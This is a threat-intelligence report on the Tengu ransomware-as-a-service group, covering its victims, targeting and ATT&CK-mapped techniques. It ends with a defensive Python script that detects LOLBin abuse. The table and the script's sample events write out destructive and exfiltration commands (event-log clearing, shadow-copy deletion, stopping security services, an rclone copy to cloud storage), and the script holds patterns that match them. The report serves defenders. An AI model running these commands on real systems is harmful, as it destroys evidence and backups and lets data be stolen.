A new and highly-active Ransomware-as-a-Service (RaaS) operation known as “Tengu” was first observed in October 2025. Classified as an Organized Crime group, Tengu conducts “hands-on,” operator-driven intrusions. The group executes a classic double-extortion model: exfiltrating sensitive data prior to encryption and then directing victims to Tor-based negotiation portals. If ransom demands are not met, the stolen data is leaked on a public blog.
Tengu’s tradecraft is defined by a deep reliance on “living-off-the-land” (LOLBin) techniques. Operators leverage trusted, signed Microsoft binaries—including PowerShell, cmd.exe, and rundll32.exe—to execute malicious payloads stealthily. This methodology is deliberately chosen to bypass common, signature-based endpoint protection and blend in with “routine administration”.
The emergence of Tengu is not an isolated event. It is a direct symptom of the 2025 threat landscape, which has seen significant law enforcement disruption of major RaaS players like LockBit and ALPHV/BlackCat. This has created a “fragmented ransomware ecosystem” and a power vacuum. Tengu is part of a “new wave” of RaaS operations competing to fill this void and recruit “orphaned” affiliates.
This “hands-on” approach, combined with LOLBin abuse, suggests a specific targeting strategy. The group’s TTPs are designed to defeat organizations that have invested in standard, signature-based security tools but lack the mature 24/7 Security Operations Center (SOC) monitoring or advanced behavioral analytics required to detect a human operator using legitimate tools in an anomalous way. This is further supported by Tengu’s atypical victimology, which shows a notable geographic focus on regions such as Morocco, Iran, the United Arab Emirates (UAE), Spain, and Brazil.
Actor Profile
Identity and Operations
Tengu is a Ransomware-as-a-Service (RaaS) operation that surfaced in October 2025 as a new entrant in the organized crime landscape. As a RaaS provider, the Tengu “core” team likely develops and maintains the ransomware payload, exfiltration infrastructure, and negotiation portals, while leasing this platform to affiliated operators who conduct the intrusions.
The group’s operational model is “hands-on” and follows a double-extortion playbook. Operators first gain access, then perform manual reconnaissance, lateral movement, and data exfiltration. Only after sensitive data has been secured do they deploy the encryptor. Victims are then directed to a Tor-based chat portal for ransom negotiations. Failure to pay results in a public “naming and shaming” and the leaking of stolen data on the group’s “TENGU Blog Leaks” site.
Brand and Naming
The group’s name is a deliberate and insightful choice. “Tengu” are drawn from Japanese folklore, described as “mischievous, part-human, part-avian spirits”. These mythological beings are defined by a “dual nature,” capable of acting as both “malevolent demons” and “tutelary deities”.
This branding is not arbitrary; it serves as a psychological and recruitment tool.
- A Brand of “Elite” Skill: In mythology, Tengu are “renowned swordsmen” and are said to have taught military arts. They are also strongly associated with arrogance and pride; the Japanese expression tengu ni naru (“becoming a tengu”) is used to describe a “conceited person”. This self-perception as elite, skilled “swordsmen” aligns perfectly with the group’s “hands-on,” operator-driven TTPs. This branding is designed to attract skilled affiliates who share this self-image of being a cut above common, automated attackers.
- A Brand of Deception: The “mischievous” and “trickster” nature of the Tengu, who “create illusions” and “play tricks”, is a direct parallel to the group’s core technical strategy. Tengu’s primary TTP is the use of legitimate, signed Microsoft binaries to execute malicious code. The explicit purpose is to “appear as routine administration” and have their malicious actions “treated as benign”. The group’s name is a direct reflection of its operational philosophy: achieving deception through legitimacy, acting as the “mischievous spirit” hiding within the machine’s routine processes.
Victims and Targeting
Documented Victims
As of late October 2025, Tengu has publicly claimed at least seven victims, with six identified across a diverse range of sectors and geographies.
- STAR LÉGUMES (Morocco): An agricultural wholesale company based in Casablanca. Following the October 2025 attack and failed negotiations, Tengu published 13 images of internal company documents as proof. This leak post alone garnered over 1,000 views, demonstrating the significant operational and reputational damage inflicted.
- FOOD & MUSIC MANAGEMENT SL (Spain): A leading company in Spain’s hospitality and entertainment sector. Claimed on October 23, 2025.
- Le MULTI LABORATOIRE LC2A (Morocco): An analytical services laboratory. Claimed on October 24, 2025.
- UniCursos (Brazil): An education company specializing in public sector exam preparation. Claimed on October 23, 2025.
- Al Rimal Group (UAE): A food product manufacturing company. Claimed on October 23, 2025.
- Qatargas and Tar Company (Iran): An industrial gas and tar provider for the petrochemical (Energy) sector. Claimed on October 23, 2025.
Targeting Strategy
Analysis of Tengu’s victim list reveals a sophisticated, two-pronged strategy.
First, the group’s geographic targeting represents a deliberate “blue ocean” strategy. The victim list is not dominated by North American or Western European targets, which remain the “epicenter” for most RaaS activity. Instead, Tengu has focused on Morocco, Iran, the UAE, and Brazil. This suggests a strategic calculation to avoid the hyper-competitive and more heavily defended US market. These targeted regions are centers of rapid economic growth and digitization, but their cybersecurity maturity, regulatory enforcement, and 24/7 monitoring capabilities may lag. Tengu is applying its “hands-on” TTPs to “softer” enterprise targets that are wealthy enough to pay but not defended well enough to stop a human-driven, LOLBin-based attack.
Second, while its geography is novel, its sector targeting is classic RaaS tradecraft. Ransomware groups have long favored industries with “minimal tolerance for downtime”. Tengu’s victim list includes Energy, Agriculture/Food Production, and Manufacturing. These are all time-sensitive, critical infrastructure, and industrial sectors where operational downtime is catastrophic. An energy provider cannot be offline, an agricultural wholesaler deals with perishable goods, and a manufacturing plant loses revenue by the minute. This choice of sector, combined with the double-extortion data leak, creates immense psychological pressure on victims and increases the likelihood of a ransom payment.
Technical Analysis: The Attack Chain
Tengu’s intrusions are “operator-driven,” blending stealth, defense evasion, and anti-forensic techniques. The following table maps their known TTPs to the MITRE ATT&CK framework, followed by a narrative breakdown of the attack chain.
Table 1: Tengu TTPs Mapped to MITRE ATT&CK
| Tactic | Technique (ID) | Technique Name | Tengu’s Implementation (What to Expect) |
|---|---|---|---|
| Initial Access | T1078 / T1133 | Valid Accounts / External Remote Services | Operator-driven intrusion leveraging stolen credentials for exposed RDP/VPN services. |
| Initial Access | T1190 / T1566 | Exploit Public-Facing Application / Phishing | Exploitation of unpatched applications and targeted phishing for initial footholds. |
| Execution | T1059.001 / T1059.003 | Command and Scripting Interpreter: PowerShell / Windows Command Shell | Use of powershell.exe and cmd.exe to run malicious commands and payloads. |
| Execution | T1218.011 | System Binary Proxy Execution: Rundll32 | rundll32.exe is used to execute malicious payloads in memory, blending in with benign system activity. |
| Credential Access | T1003.001 | OS Credential Dumping: LSASS Memory | Dumping the LSASS process memory to harvest clear-text passwords and hashes. |
| Defense Evasion | T1562.001 / T1562.004 | Impair Defenses: Disable or Modify Tools / Disable or Modify System Firewall | Disables security and update services (e.g., wscsvc, wuauserv) to blind EDR/AV. |
| Defense Evasion | T1070.001 | Indicator Removal: Clear Windows Event Logs | wevtutil cl * is used to erase evidence of the intrusion, hampering forensic analysis. |
| Discovery | T1018 / T1046 | Remote System Discovery / Network Service Scanning | Standard network/service discovery and Active Directory recon to map the environment. |
| Lateral Movement | T1021 | Remote Services | Operator-driven movement using compromised admin credentials via SMB/WMI/PsExec. |
| Collection | T1074.001 | Data Staged: Local Data Staging | Data is collected and compressed in a central location before exfiltration. |
| Exfiltration | T1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage | Use of legitimate tools like Rclone or WinSCP to exfiltrate data to cloud services (e.g., MEGA). |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | Bulk data transfer over encrypted channels. |
| Impact | T1490 | Inhibit System Recovery | vssadmin delete shadows /all /quiet is used to delete Volume Shadow Copies. |
| Impact | T1486 | Data Encrypted for Impact | |
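As an added example (not part of the original report and not Tengu tooling), the following Python script runs detection logic for the Table 1 LOLBin commands over constructed process-creation events and then groups hits per account, since the report’s point is that a single legitimate command looks like routine administration while one operator chaining several of these techniques does not. Host names, account names, file paths and the `mega:` Rclone remote are assumptions.

```python
import re
from collections import defaultdict

# Constructed process-creation events (Windows 4688 / Sysmon EID 1 style);
# not real telemetry from any Tengu intrusion.
SAMPLE_EVENTS = [
    {"host": "srv01", "user": "CORP\\admin2", "cmdline": "vssadmin list shadows"},
    {"host": "srv01", "user": "CORP\\admin2", "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"host": "srv01", "user": "CORP\\svc_bk", "cmdline": "wevtutil cl *"},
    {"host": "srv01", "user": "CORP\\svc_bk", "cmdline": "vssadmin delete shadows /all /quiet"},
    {"host": "srv01", "user": "CORP\\svc_bk", "cmdline": "sc stop wscsvc"},
    {"host": "fs02", "user": "CORP\\svc_bk", "cmdline": "rclone.exe copy D:\\Finance mega:drop -q"},
    {"host": "ws17", "user": "CORP\\jdoe", "cmdline": "rundll32.exe C:\\Users\\jdoe\\AppData\\Local\\Temp\\upd.dll,Start"},
]

# One rule per Table 1 technique that shows up on a process command line:
# (ATT&CK ID, description, case-insensitive regex).
RULES = [
    ("T1070.001", "Clear Windows Event Logs", r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b"),
    ("T1490", "Inhibit System Recovery: shadow copy deletion", r"\bvssadmin(\.exe)?\s+delete\s+shadows\b"),
    ("T1562.001", "Impair Defenses: stopping security/update services",
     r"\b(sc(\.exe)?\s+(stop|config|delete)|stop-service|set-service)\b.*\b(wscsvc|wuauserv)\b"),
    ("T1218.011", "Rundll32 loading a DLL from a user-writable path",
     r"\brundll32(\.exe)?\b.*\\(users|programdata|temp)\\"),
    ("T1567.002", "Rclone transfer to cloud storage", r"\brclone(\.exe)?\s+(copy|sync|move)\b"),
]
COMPILED = [(tid, name, re.compile(rx, re.IGNORECASE)) for tid, name, rx in RULES]


def detect(events):
    """Return one (host, user, attack_id, name, cmdline) tuple per matching rule."""
    hits = []
    for ev in events:
        for tid, name, rx in COMPILED:
            if rx.search(ev["cmdline"]):
                hits.append((ev["host"], ev["user"], tid, name, ev["cmdline"]))
    return hits


def suspicious_operators(hits, min_techniques=2):
    """Group hits by account across all hosts: one LOLBin hit may be routine
    administration, but one account touching several distinct Table 1
    techniques (here also across two hosts) is the hands-on-operator signal."""
    techniques = defaultdict(set)
    for _host, user, tid, _name, _cmd in hits:
        techniques[user].add(tid)
    return {u: sorted(t) for u, t in techniques.items() if len(t) >= min_techniques}


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
    print(suspicious_operators(detect(SAMPLE_EVENTS)))
```

The benign `vssadmin list shadows` and `rundll32.exe shell32.dll,...` lines produce no hits, while the single rundll32 hit for `jdoe` stays below the two-technique threshold and only `svc_bk` is surfaced as an operator.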

